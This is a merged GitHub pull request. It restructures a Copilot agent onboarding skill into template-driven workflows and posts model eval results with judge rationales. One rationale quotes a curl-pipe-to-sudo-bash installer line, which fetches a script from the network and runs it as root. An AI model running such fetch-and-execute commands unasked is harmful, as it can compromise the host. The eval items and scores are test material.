feat(onboarding): template-driven scaffold + register prompts/eval in matrix#142

Merged: arnaudlh merged 17 commits into main from feat/onboarding-overhaul on Jun 8, 2026

@arnaudlh
Member

Summary

End-to-end overhaul of the /git-ape-onboarding flow plus the supporting packaging, instructions, eval registration, and regenerated docs. Five themed commits, each independently revertable:

| # | Commit | Why |
|---|---|---|
| 1 | chore(models): rename gpt-5-codex to gpt-5.3-codex | waza catalog renamed; aligns manifest tiers + bench prompt defaults |
| 2 | feat(onboarding): replace exampleyml stubs with template-driven scaffold | Move workflow scaffolds out of .github/workflows/ (where the .exampleyml hack lived) into .github/skills/git-ape-onboarding/templates/; ship sync scripts; add eval suite + CI parity check; register the eval in the pilot tier |
| 3 | feat(extension): register prompt files in VSIX and tighten .vscodeignore | plugin.json now declares prompts:; package.template.json registers all 9 prompts as chatPromptFiles; .vscodeignore sheds dev-only .github subtrees from the published VSIX |
| 4 | docs(instructions): switch deploy/destroy guidance to Azure Deployment Stacks | Copilot-instructions caught up with the actual templates: az stack sub create/delete --action-on-unmanage deleteAll instead of az deployment sub + az group delete (see #30) |
| 5 | docs(website): regenerate for templated workflows and prompt assets | Generator now scans both .github/workflows/ and the skill templates directory, tags scaffolded workflows with a Docusaurus admonition |

Key change: .exampleyml is gone

Old shape (this repo's .github/workflows/):

git-ape-plan.exampleyml
git-ape-deploy.exampleyml
git-ape-destroy.exampleyml
git-ape-verify.exampleyml

.exampleyml was a workaround so GitHub Actions wouldn't auto-load the scaffolds.

New shape (.github/skills/git-ape-onboarding/templates/workflows/):

git-ape-plan.yml
git-ape-deploy.yml
git-ape-destroy.yml
git-ape-verify.yml
git-ape-drift.md          # agentic workflow source
git-ape-drift.lock.yml    # compiled lockfile

The path is no longer .github/workflows/ so the workaround isn't needed. /git-ape-onboarding copies these into the target repo with skip-on-collision so customized workflows are never overwritten.
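The skip-on-collision behaviour described above can be sketched roughly as follows. This is an illustration in Python only: the PR ships scripts/sync-templates.{sh,ps1}, and the helper name `copy_templates`, the `demo` function, and the throwaway directory layout are assumptions, not the skill's actual implementation.

```python
import shutil
import tempfile
from pathlib import Path


def copy_templates(template_dir: Path, target_dir: Path) -> dict:
    """Copy files from template_dir into target_dir, skipping collisions.

    Hypothetical helper: a file that already exists in target_dir is left
    untouched and reported under "skipped" instead of being overwritten.
    """
    result = {"copied": [], "skipped": []}
    target_dir.mkdir(parents=True, exist_ok=True)
    for src in sorted(template_dir.iterdir()):
        if not src.is_file():
            continue
        dest = target_dir / src.name
        if dest.exists():
            result["skipped"].append(src.name)  # the customized workflow wins
        else:
            shutil.copy2(src, dest)
            result["copied"].append(src.name)
    return result


def demo() -> dict:
    """Run copy_templates against throwaway directories."""
    with tempfile.TemporaryDirectory() as tmp:
        templates = Path(tmp) / "templates" / "workflows"
        target = Path(tmp) / "target" / ".github" / "workflows"
        templates.mkdir(parents=True)
        target.mkdir(parents=True)
        for name in ("git-ape-plan.yml", "git-ape-deploy.yml"):
            (templates / name).write_text("name: template\n")
        # Simulate a workflow the user has already customized.
        (target / "git-ape-plan.yml").write_text("name: customized\n")
        result = copy_templates(templates, target)
        result["plan_content"] = (target / "git-ape-plan.yml").read_text()
        return result


if __name__ == "__main__":
    print(demo())
```

Reporting the skipped names, rather than silently ignoring them, is one way to let the caller surface a notice for each collision.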

Eval registration

Adds git-ape-onboarding to pilot tier in .github/evals/manifest.yaml — matches its prior 4-model bench coverage. The eval ships 4 tasks: positive-first-time-setup, positive-multi-env, positive-skip-on-collision, negative-storage-comparison. Closes part of #93.

Verification done

  • actionlint clean on the new git-ape-onboarding-template-check.yml
  • node scripts/generate-docs.js re-runs with no further drift
  • Eval YAML files parse
  • All shell scripts under scripts/ carry the executable bit

Dependency

Depends on #140 (LLM-as-judge → claude-opus-4.7). This PR is mergeable independently — if it lands first, the new git-ape-onboarding eval will run with whatever judge is pinned at merge time, then automatically pick up the opus judge once #140 merges. Prefer to merge #140 first to avoid a mixed-judge snapshot.

Risk

Medium-low.

  • Workflow templates are new files in a non-loaded path, no production CI impact.
  • The 4 .exampleyml deletions are the only destructive change in this repo; their content is preserved verbatim in the templates directory.
  • Eval registration adds 4 new task runs to the next waza-evals matrix dispatch (pilot × 4 models = 16 legs). Quota cost: ~equivalent to prereq-check baseline.


Note: Recreated as a same-repo PR (was originally #141 from arnaudlh/git-ape). Fork PRs cannot read the COPILOT_GITHUB_TOKEN secret, so the waza eval matrix was skipping. Identical commits (8d5b9cf5..e66e2ecc), now wired so evals actually run. Closes #141.

arnaudlh added 6 commits May 29, 2026 16:22
The waza model catalog now ships gpt-5-codex under its versioned ID
gpt-5.3-codex. Align manifest tiers and bench-prompt argument hints
so dispatched runs resolve to a valid model.

- .github/evals/manifest.yaml: pilot + expanded tier model lists
- .github/prompts/agent-bench.prompt.md: default models in argument-hint + body
- .github/prompts/skill-bench.prompt.md: default models in argument-hint + body

🔖 - Generated by Copilot

Rewrite git-ape-onboarding as a skill-driven CLI playbook backed by a
sync-able template bundle. The previous .exampleyml workflows lived in
this repo's .github/workflows/ and were copy-pasted by users; they're
now first-class templates under the skill and pushed into target repos
by scripts/sync-templates.{sh,ps1}.

What ships:
- .github/agents/git-ape-onboarding.agent.md: rewritten flow + tools
- .github/skills/git-ape-onboarding/SKILL.md: new playbook structure
- .github/skills/git-ape-onboarding/scripts/: bash + pwsh helpers
    - scaffold-repo.{sh,ps1}: bootstrap target repo
    - sync-templates.{sh,ps1}: drop-in workflow + instructions update
- .github/skills/git-ape-onboarding/templates/: canonical target-repo
  artifacts (copilot-instructions.md, workflows/git-ape-{plan,deploy,
  destroy,verify,drift}.yml + drift agentic workflow + drift lockfile)
- .github/evals/git-ape-onboarding/: positive + negative tasks for
  first-time-setup, multi-env, skip-on-collision, and storage refusal
- .github/workflows/git-ape-onboarding-template-check.yml: CI check
  that the shipped templates pass actionlint and round-trip cleanly
- .github/evals/manifest.yaml: register git-ape-onboarding in pilot
  tier (matches its prior 4-model bench coverage)

Removed:
- .github/workflows/git-ape-{deploy,destroy,plan,verify}.exampleyml:
  retired — their content is now in skills/.../templates/workflows/

The .exampleyml extension was a workaround to keep GitHub Actions from
auto-loading workflow scaffolds; templates under the skill don't need
the workaround because their path isn't .github/workflows/.

🐵 - Generated by Copilot

Wire the .github/prompts/ directory into the published artifacts:

- plugin.json: declare 'prompts: .github/prompts/' so the plugin
  manifest exposes them alongside agents and skills.
- extension/package.template.json: register all 9 prompt files
  (git-ape, agent-{bench,improve,onboard,promote}, skill-{bench,
  improve,onboard,promote}) under chatPromptFiles so VS Code picks
  them up from the installed extension.
- extension/.vscodeignore: explicitly exclude dev-only .github
  subtrees (actionlint, dependabot, aw, copilot, evals, plugins,
  references, scripts, templates, workflows). Keeps agents/, skills/,
  plugin/, copilot-instructions.md, and now prompts/ in the VSIX
  while shedding ~MB of CI tooling that shouldn't ship to users.

🧩 - Generated by Copilot

…t Stacks

Align copilot-instructions with the actual workflow templates shipped
by the onboarding skill: use 'az stack sub' instead of 'az deployment
sub' / 'az group delete' for the full plan-deploy-destroy lifecycle.

Why this matters for agents reading the instructions:
- The stack is the single unit of lifecycle — create, update, and
  destroy all operate on it, not on the underlying RGs.
- 'deleteAll' on unmanage cleans up every managed resource across
  every scope (subscription, multiple RGs, sub-scope role/policy
  assignments) in one call. No orphans, idempotent re-runs.
- See #30 for the design rationale.

Sample workflow snippet now also passes --action-on-unmanage deleteAll,
--deny-settings-mode none, --yes — matching what
.github/skills/git-ape-onboarding/templates/workflows/git-ape-deploy.yml
generates in target repos.
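As a rough illustration of the lifecycle described in this commit, the sketch below only assembles the argument lists for a create and a delete call; it does not invoke the Azure CLI. The flags --action-on-unmanage deleteAll, --deny-settings-mode none, and --yes come from the text above. The stack name, location, and template path are hypothetical placeholders, and the real template workflow may pass additional arguments.

```python
import shlex


def stack_create_args(name: str, location: str, template_file: str) -> list:
    """Build argv for creating or updating a subscription-scoped stack."""
    return [
        "az", "stack", "sub", "create",
        "--name", name,
        "--location", location,
        "--template-file", template_file,
        "--action-on-unmanage", "deleteAll",  # clean up resources that leave the stack
        "--deny-settings-mode", "none",
        "--yes",
    ]


def stack_delete_args(name: str) -> list:
    """Build argv for destroying the stack and everything it manages."""
    return [
        "az", "stack", "sub", "delete",
        "--name", name,
        "--action-on-unmanage", "deleteAll",
        "--yes",
    ]


if __name__ == "__main__":
    # Hypothetical values, used for illustration only.
    print(shlex.join(stack_create_args("demo-stack", "westeurope", "main.bicep")))
    print(shlex.join(stack_delete_args("demo-stack")))
```

Both calls address the stack by name, which mirrors the point that the stack, not the underlying resource groups, is the unit of lifecycle.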

📘 - Generated by Copilot

scripts/generate-docs.js: teach the workflow doc generator about two
source directories, the existing CI workflows under .github/workflows/
and the new user-facing templates under .github/skills/git-ape-
onboarding/templates/workflows/. Templated workflows get a Docusaurus
:::info admonition explaining they're scaffolded by /git-ape-onboarding
and don't run in the git-ape repo itself. Drops .exampleyml handling
since those stubs are gone.
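The two-directory scan could look roughly like the sketch below. It is written in Python for illustration and is not the code in scripts/generate-docs.js; the function name, the page dictionary shape, and the admonition body text are assumptions. Only the admonition title and the two source directories come from this PR.

```python
import tempfile
from pathlib import Path

# Title taken from the PR text; the body sentence is an assumed wording.
ADMONITION = (
    ":::info[Scaffolded by /git-ape-onboarding]\n"
    "Shipped as a template; it does not run in the git-ape repo itself.\n"
    ":::\n"
)


def collect_workflow_pages(ci_dir: Path, template_dir: Path) -> list:
    """Build one page per .yml file, tagging templated workflows."""
    pages = []
    for source_dir, templated in ((ci_dir, False), (template_dir, True)):
        for path in sorted(source_dir.glob("*.yml")):
            # git-ape-drift.lock.yml -> git-ape-drift-lock
            slug = path.name[: -len(".yml")].replace(".", "-")
            body = f"# {slug}\n\n"
            if templated:
                body += ADMONITION + "\n"
            body += f"Source: {path.name}\n"
            pages.append({"slug": slug, "templated": templated, "markdown": body})
    return pages


def demo() -> list:
    """Run the scan over two throwaway directories."""
    with tempfile.TemporaryDirectory() as tmp:
        ci_dir = Path(tmp) / "workflows"
        template_dir = Path(tmp) / "templates" / "workflows"
        ci_dir.mkdir(parents=True)
        template_dir.mkdir(parents=True)
        (ci_dir / "git-ape-onboarding-template-check.yml").write_text("name: ci\n")
        (template_dir / "git-ape-plan.yml").write_text("name: plan\n")
        (template_dir / "git-ape-drift.lock.yml").write_text("name: drift\n")
        (template_dir / "git-ape-drift.md").write_text("agentic source\n")
        return collect_workflow_pages(ci_dir, template_dir)


if __name__ == "__main__":
    for page in demo():
        print(page["slug"], page["templated"])
```

The .md agentic source is deliberately not matched by the glob, in line with the hand-curated page for that file.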

README.md: update the Workflows table + repo tree to reflect the new
layout. The four git-ape-{plan,deploy,destroy,verify}.exampleyml stubs
no longer exist in .github/workflows/; their canonical sources are
inside the onboarding skill's templates/ directory and scaffolded into
user repos as ready-to-run .yml files. Mention skip-on-collision so
readers know existing workflows are never overwritten.

website/docs/: regenerate every page that the generator touches:
- workflows/{git-ape-plan,deploy,destroy,verify}.md: relocated to the
  template source path + new admonition
- workflows/git-ape-drift-lock.md, git-ape-onboarding-template-check.md
  (new pages)
- workflows/overview.md: refreshed listing
- agents/git-ape-onboarding.md, skills/git-ape-onboarding.md,
  getting-started/onboarding.md: re-synced from current sources
- reference/{plugin-json,marketplace}.md: re-synced to pick up prompts:
  registration and chatPromptFiles entries

📚 - Generated by Copilot

…source

The auto-generated 'Continuous Drift Remediation' page documents the
compiled '.lock.yml' shape. This adds the missing hand-curated page
documenting the agentic '.md' source — schedule, severity model,
anti-flapping rules, safe-outputs configuration, and how to recompile
after editing.

Ported from the private repo with three small adaptations:
- Workflow-file path updated to the template location under
  .github/skills/git-ape-onboarding/templates/workflows/git-ape-drift.md
  (matches the autogen lock-page convention).
- Added the ':::info[Scaffolded by /git-ape-onboarding]' admonition for
  consistency with the autogen lock page; clarifies the file is shipped
  as a template, not run in the git-ape repo itself.
- Added a Related section linking to the lock-page, the
  azure-drift-detector skill, the deployment guide, and the use-case
  overview so readers can navigate the full drift story.

Marked HAND-CURATED at the top so generate-docs.js maintainers know
not to add a generator branch for '.md' workflow sources.

🌊 - Generated by Copilot
@github-actions
Contributor

github-actions Bot commented May 29, 2026

🤖 Waza agent evals (advisory)

ℹ️ No agents evaluated. Changed agent(s) have no eval directory: azure-resource-deployer, git-ape, git-ape-onboarding

Ran 0 agent evals against claude-sonnet-4.6. Each eval consumes ~5 premium Copilot requests; results are non-blocking — investigate failures via the workflow logs and the per-agent waza-agent-results-* artifacts.

How this works: This workflow auto-syncs the canonical .github/agents/<name>.agent.md into the sibling mirror inside .github/evals/agents/<name>/ before each run, so the score below reflects the version of the agent in this PR — not whatever was committed when the eval was first wired up.

📊 Agent file token comparison vs main (advisory)

No .agent.md files changed vs main (or token-compare returned no entries).

No agents in scope for this PR.

@github-actions
Contributor

github-actions Bot commented May 29, 2026

🧪 Waza skill evals (advisory)

🔁 Full matrix run. Project-wide config change (.waza.yaml, manifest, or workflow file) → full matrix

Ran 12 matrix legs in parallel (skills × models). Results are non-blocking — investigate failures via the workflow logs and the per-leg waza-results-* artifacts.

Legend: Models flagged baseline: true in .github/evals/manifest.yaml (currently: gpt-5.4) run with --baseline (A/B mode) to cap quota. All other models run standard. Judge model is fixed at claude-opus-4.7 across all legs.
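A minimal sketch of how a skills × models matrix with a per-model baseline flag might be expanded. The manifest shape shown here is hypothetical; the real .github/evals/manifest.yaml may be structured differently. The model IDs and the --baseline flag come from this log. The demo lists only the two skills whose results appear in this comment, so it yields 8 legs rather than the 12 reported above.

```python
from itertools import product

# Hypothetical manifest shape, for illustration only.
MANIFEST = {
    "skills": ["prereq-check", "git-ape-onboarding"],
    "models": [
        {"id": "claude-opus-4.6"},
        {"id": "claude-sonnet-4.6"},
        {"id": "gpt-5.3-codex"},
        {"id": "gpt-5.4", "baseline": True},
    ],
}


def expand_matrix(manifest: dict) -> list:
    """Return one leg per (skill, model) pair, adding --baseline where flagged."""
    legs = []
    for skill, model in product(manifest["skills"], manifest["models"]):
        flags = ["--baseline"] if model.get("baseline") else []
        legs.append({"skill": skill, "model": model["id"], "flags": flags})
    return legs


if __name__ == "__main__":
    for leg in expand_matrix(MANIFEST):
        print(leg["skill"], leg["model"], " ".join(leg["flags"]))
```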

📊 Token comparison vs main (advisory)
{
  "baseRef": "main",
  "headRef": "WORKING",
  "threshold": 10,
  "passed": true,
  "timestamp": "2026-06-08T09:00:45.013429047Z",
  "summary": {
    "totalBefore": 0,
    "totalAfter": 38247,
    "totalDiff": 38247,
    "percentChange": 100,
    "filesAdded": 15,
    "filesRemoved": 0,
    "filesModified": 0,
    "filesIncreased": 15,
    "filesDecreased": 0
  },
  "files": [
    {
      "file": ".github/skills/azure-cost-estimator/SKILL.md",
      "before": null,
      "after": {
        "tokens": 3227,
        "characters": 11926,
        "lines": 344
      },
      "diff": 3227,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-deployment-preflight/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1444,
        "characters": 6267,
        "lines": 211
      },
      "diff": 1444,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-drift-detector/SKILL.md",
      "before": null,
      "after": {
        "tokens": 3179,
        "characters": 13149,
        "lines": 460
      },
      "diff": 3179,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-integration-tester/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1559,
        "characters": 6793,
        "lines": 247
      },
      "diff": 1559,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-naming-research/SKILL.md",
      "before": null,
      "after": {
        "tokens": 486,
        "characters": 2108,
        "lines": 44
      },
      "diff": 486,
      "percentChange": 100,
      "status": "added",
      "limit": 500
    },
    {
      "file": ".github/skills/azure-policy-advisor/SKILL.md",
      "before": null,
      "after": {
        "tokens": 6233,
        "characters": 26754,
        "lines": 642
      },
      "diff": 6233,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-resource-availability/SKILL.md",
      "before": null,
      "after": {
        "tokens": 2409,
        "characters": 9867,
        "lines": 307
      },
      "diff": 2409,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-resource-visualizer/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1490,
        "characters": 6165,
        "lines": 191
      },
      "diff": 1490,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-rest-api-reference/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1827,
        "characters": 8416,
        "lines": 199
      },
      "diff": 1827,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-role-selector/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1276,
        "characters": 5627,
        "lines": 161
      },
      "diff": 1276,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-security-analyzer/SKILL.md",
      "before": null,
      "after": {
        "tokens": 5322,
        "characters": 21405,
        "lines": 450
      },
      "diff": 5322,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-stack-deploy/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1912,
        "characters": 7525,
        "lines": 159
      },
      "diff": 1912,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-stack-destroy/SKILL.md",
      "before": null,
      "after": {
        "tokens": 2644,
        "characters": 10670,
        "lines": 180
      },
      "diff": 2644,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/git-ape-onboarding/SKILL.md",
      "before": null,
      "after": {
        "tokens": 3101,
        "characters": 12788,
        "lines": 272
      },
      "diff": 3101,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/prereq-check/SKILL.md",
      "before": null,
      "after": {
        "tokens": 2138,
        "characters": 8019,
        "lines": 147
      },
      "diff": 2138,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    }
  ]
}
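To read the report above at a glance, a short script can list the files over their limit and by how much. The sketch assumes only the field names visible in the JSON (files, file, after.tokens, limit); the function name is hypothetical, and the sample data is a two-entry excerpt of the report.

```python
import json


def over_limit_files(report: dict) -> list:
    """Return (file, tokens_over_limit) pairs, largest overshoot first."""
    rows = []
    for entry in report["files"]:
        after = entry.get("after") or {}
        tokens = after.get("tokens", 0)
        limit = entry.get("limit")
        if limit is not None and tokens > limit:
            rows.append((entry["file"], tokens - limit))
    return sorted(rows, key=lambda row: row[1], reverse=True)


# Two entries copied from the report above.
SAMPLE = json.loads("""
{
  "files": [
    {"file": ".github/skills/azure-naming-research/SKILL.md",
     "after": {"tokens": 486}, "limit": 500},
    {"file": ".github/skills/prereq-check/SKILL.md",
     "after": {"tokens": 2138}, "limit": 500}
  ]
}
""")

if __name__ == "__main__":
    for name, excess in over_limit_files(SAMPLE):
        print(f"{name}: {excess} tokens over limit")
```

On this excerpt only prereq-check is reported, 1638 tokens over its 500-token limit; azure-naming-research stays under at 486.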

Skill: prereq-check

📈 Score (per model) + Suggestions/Recommendations
Model: claude-opus-4.6

Running benchmark: prereq-check-eval
Skill: prereq-check
Engine: copilot-sdk
Model: claude-opus-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [2/4] Negative — Azure service concept question
✓ [1/4] Negative — Editing an ARM template
✓ [3/4] Positive — "command not found" failure
✓ [4/4] Positive — "What do I need to install?"

🧪 Waza Eval Results

Status: ✅ Passed | Score: 0.79 | Duration: 2m0.341s

  • Tests: 4 total, 4 passed, 0 failed, 0 errors
  • Success Rate: 100.0%
  • Score Range: 0.57 - 1.00 (σ=0.2074)

Task Results

| Task | Score | Status | Graders |
|---|---|---|---|
| Negative — Editing an ARM template | 0.57 | | budget, trigger_relevance_negative |
| Negative — Azure service concept question | 0.60 | | budget, trigger_relevance_negative |
| Positive — "command not found" failure | 1.00 | | answer_quality, budget, trigger_relevance_positive |
| Positive — "What do I need to install?" | 1.00 | | answer_quality, budget, trigger_relevance_positive |
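The headline figures for this run appear consistent with a plain mean and a population standard deviation over the four task scores. That reading is an assumption and is not confirmed by the waza output; because the inputs below are the rounded scores from the table, they reproduce the reported 0.79 and σ=0.2074 only approximately.

```python
from statistics import mean, pstdev

# Rounded task scores from the table above.
TASK_SCORES = [0.57, 0.60, 1.00, 1.00]


def summarize(scores: list) -> dict:
    """Aggregate per-task scores (assumed: mean and population stdev)."""
    return {
        "score": mean(scores),
        "min": min(scores),
        "max": max(scores),
        "sigma": pstdev(scores),
    }


if __name__ == "__main__":
    summary = summarize(TASK_SCORES)
    print(f"Score: {summary['score']:.2f}")
    print(f"Score Range: {summary['min']:.2f} - {summary['max']:.2f}")
    print(f"sigma: {summary['sigma']:.4f}")
```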

Benchmark: prereq-check-eval | Skill: prereq-check | Model: claude-opus-4.6

Results saved to: .waza-results/prereq-check-claude-opus-4.6.json
JUnit XML saved to: .waza-results/prereq-check-claude-opus-4.6.junit.xml

Model: claude-sonnet-4.6

Running benchmark: prereq-check-eval
Skill: prereq-check
Engine: copilot-sdk
Model: claude-sonnet-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [1/4] Negative — Editing an ARM template
✓ [2/4] Negative — Azure service concept question
✓ [4/4] Positive — "What do I need to install?"
[ERROR] session error: Execution failed: CAPIError: 422 422 422 Unprocessable Entity
(Request ID: 604A:1AA583:402BCC:435B2F:6A268531)

✗ [3/4] Positive — "command not found" failure

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.77 | Duration: 3m37.483s

  • Tests: 4 total, 3 passed, 1 failed, 0 errors
  • Success Rate: 75.0%
  • Score Range: 0.57 - 1.00 (σ=0.1839)

Task Results

| Task | Score | Status | Graders |
|---|---|---|---|
| Negative — Editing an ARM template | 0.57 | | budget, trigger_relevance_negative |
| Negative — Azure service concept question | 0.60 | | budget, trigger_relevance_negative |
| Positive — "command not found" failure | 0.89 | | answer_quality, budget, trigger_relevance_positive |
| Positive — "What do I need to install?" | 1.00 | | answer_quality, budget, trigger_relevance_positive |

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Positive — "command not found" failure: 67% pass rate, score=0.89±0.16

Failed Task Details

Positive — "command not found" failure

Run 2/3 (error):

  • answer_quality (0.00): fail: Assistant did not deliver any user-facing response: The assistant's previous response only invoked the prereq-check skill and attempted tool calls that failed with "unexpected user permission response". No user-facing message was produced. Missing all four PASS criteria: (1) did not name az/gh/jq/git, (2) did not provide install commands, (3) did not recommend version verification, (4) did not give a verdict or next steps.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (1.00): Prompt is trigger-aligned (score 1.00 >= 0.50)
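The flaky-task line (67% pass rate, score=0.89±0.16) can be reproduced under three assumptions that the log does not state outright: a run's score is the mean of its grader scores, the task score is the mean across runs, and the ± value is a population standard deviation. The two passing runs are assumed to have scored 1.00 on every grader; only the failing run's grader scores are taken from the details above.

```python
from statistics import mean, pstdev

# Grader scores per run. Run 2 is from the failure details above;
# runs 1 and 3 are assumed to be perfect passes.
RUNS = [
    {"passed": True, "graders": [1.00, 1.00, 1.00]},
    {"passed": False, "graders": [0.00, 1.00, 1.00]},
    {"passed": True, "graders": [1.00, 1.00, 1.00]},
]


def task_summary(runs: list) -> dict:
    """Summarize repeated runs of one task (assumed aggregation rules)."""
    run_scores = [mean(run["graders"]) for run in runs]
    return {
        "pass_rate": sum(run["passed"] for run in runs) / len(runs),
        "score": mean(run_scores),
        "spread": pstdev(run_scores),
    }


if __name__ == "__main__":
    summary = task_summary(RUNS)
    print(
        f"{summary['pass_rate']:.0%} pass rate, "
        f"score={summary['score']:.2f}±{summary['spread']:.2f}"
    )
```

Under the same assumptions, a single zero on answer_quality costs one third of that run's score, which is why one errored run out of three moves the task score from 1.00 to about 0.89.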

Benchmark: prereq-check-eval | Skill: prereq-check | Model: claude-sonnet-4.6

Results saved to: .waza-results/prereq-check-claude-sonnet-4.6.json

Model: gpt-5.3-codex

Running benchmark: prereq-check-eval
Skill: prereq-check
Engine: copilot-sdk
Model: gpt-5.3-codex
Judge Model: claude-opus-4.7
Parallel: 4 workers

[ERROR] session error: You've hit your rate limit. Please wait for your limit to reset in under a minute or switch to auto model to continue. Learn More (https://docs.github.com/copilot/concepts/rate-limits). (Request ID: E82A:1F8B1A:3D7FE0:408A35:6A2684DF)

[ERROR] session error: You've hit your rate limit. Please wait for your limit to reset in under a minute or switch to auto model to continue. Learn More (https://docs.github.com/copilot/concepts/rate-limits). (Request ID: E82A:1F8B1A:3D7F60:4089A4:6A2684DE)

✓ [1/4] Negative — Editing an ARM template
✗ [2/4] Negative — Azure service concept question
✗ [4/4] Positive — "What do I need to install?"
✗ [3/4] Positive — "command not found" failure

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.74 | Duration: 2m43.554s

  • Tests: 4 total, 1 passed, 3 failed, 0 errors
  • Success Rate: 25.0%
  • Score Range: 0.57 - 0.89 (σ=0.1519)

Task Results

| Task | Score | Status | Graders |
|---|---|---|---|
| Negative — Editing an ARM template | 0.57 | | budget, trigger_relevance_negative |
| Negative — Azure service concept question | 0.60 | | budget, trigger_relevance_negative |
| Positive — "command not found" failure | 0.89 | | answer_quality, budget, trigger_relevance_positive |
| Positive — "What do I need to install?" | 0.89 | | answer_quality, budget, trigger_relevance_positive |

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Negative — Azure service concept question: 67% pass rate, score=0.60±0.00
  • Positive — "command not found" failure: 67% pass rate, score=0.89±0.16
  • Positive — "What do I need to install?": 67% pass rate, score=0.89±0.16

Failed Task Details

Negative — Azure service concept question

Run 1/3 (error):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.20): Prompt correctly treated as non-trigger (score 0.20 < 0.50)

Positive — "command not found" failure

Run 3/3 (failed):

  • answer_quality (0.00): fail: Missing concrete install command for az: Criterion 2 not met: the response does not provide a concrete install command for az on any platform. It only vaguely says "On Linux, install from your distro/package source (or official vendor repos) for azure-cli, gh, jq, and git" without giving an actual command like brew install azure-cli, sudo apt-get install azure-cli, curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash, or winget install Microsoft.AzureCLI. Criteria 1, 3, and 4 are met (all four tools named with versions; verification commands az version, gh --version, etc. provided; verdict ⚠️ REPORTED MISSING with az login/gh auth login next steps).
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (1.00): Prompt is trigger-aligned (score 1.00 >= 0.50)

Positive — "What do I need to install?"

Run 1/3 (error):

  • answer_quality (0.00): fail: No prior assistant response exists to grade: There is no previous assistant response in this session to evaluate. The user's question about Git-Ape onboarding prerequisites was never answered, so none of the four PASS criteria (required tools list, auth requirements, version guidance, install commands/verification) can be met.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (1.00): Prompt is trigger-aligned (score 1.00 >= 0.50)

Benchmark: prereq-check-eval | Skill: prereq-check | Model: gpt-5.3-codex

Results saved to: .waza-results/prereq-check-gpt-5.3-codex.json

Model: gpt-5.4 (baseline, A/B mode)

Running benchmark: prereq-check-eval
Skill: prereq-check
Engine: copilot-sdk
Model: gpt-5.4
Judge Model: claude-opus-4.7
Parallel: 4 workers

════════════════════════════════════════════════════════════════
PASS 1: Skills-Enabled Run
════════════════════════════════════════════════════════════════
✓ [2/4] Negative — Azure service concept question
✓ [1/4] Negative — Editing an ARM template
✗ [4/4] Positive — "What do I need to install?"
✓ [3/4] Positive — "command not found" failure

════════════════════════════════════════════════════════════════
PASS 2: Skills Baseline (skills stripped)
════════════════════════════════════════════════════════════════
✓ [1/4] Negative — Editing an ARM template
✓ [2/4] Negative — Azure service concept question
✗ [3/4] Positive — "command not found" failure
✓ [4/4] Positive — "What do I need to install?"

════════════════════════════════════════════════════════════════
SKILL IMPACT ANALYSIS
════════════════════════════════════════════════════════════════
Overall Performance Delta:
With Skills: 75.0% (3/4 tasks passed)
Without Skills: 75.0% (3/4 tasks passed)
Impact: no change

Per-Task Breakdown:
• Negative — Editing an ARM template [NEUTRAL] 100% → 100% (+0pp)
• Negative — Azure service concept question [NEUTRAL] 100% → 100% (+0pp)
• Positive — "command not found" failure [IMPROVED] 67% → 100% (+33pp)
• Positive — "What do I need to install?" [REGRESSED] 100% → 67% (-33pp)

Verdict: Skills have NEUTRAL IMPACT (no net change)
════════════════════════════════════════════════════════════════
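The per-task breakdown above can be recomputed from the two pass rates for each task. This is a sketch under assumptions: the labels and the rounding to whole percentage points mirror the log, but the function name and the short task keys are hypothetical, and the 67% entries are modelled as 2 passes out of 3 runs.

```python
def impact(without_skills: float, with_skills: float) -> tuple:
    """Return (label, delta in percentage points) for one task."""
    delta_pp = round((with_skills - without_skills) * 100)
    if delta_pp > 0:
        label = "IMPROVED"
    elif delta_pp < 0:
        label = "REGRESSED"
    else:
        label = "NEUTRAL"
    return label, delta_pp


# (pass rate without skills, pass rate with skills); keys are hypothetical.
PASS_RATES = {
    "arm-template-edit": (1.0, 1.0),
    "service-concept-question": (1.0, 1.0),
    "command-not-found": (2 / 3, 1.0),
    "what-to-install": (1.0, 2 / 3),
}

if __name__ == "__main__":
    for task, (before, after) in PASS_RATES.items():
        label, delta = impact(before, after)
        print(f"{task} [{label}] {before:.0%} -> {after:.0%} ({delta:+d}pp)")
```

One improvement and one regression of equal size cancel out, which matches the neutral overall verdict.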

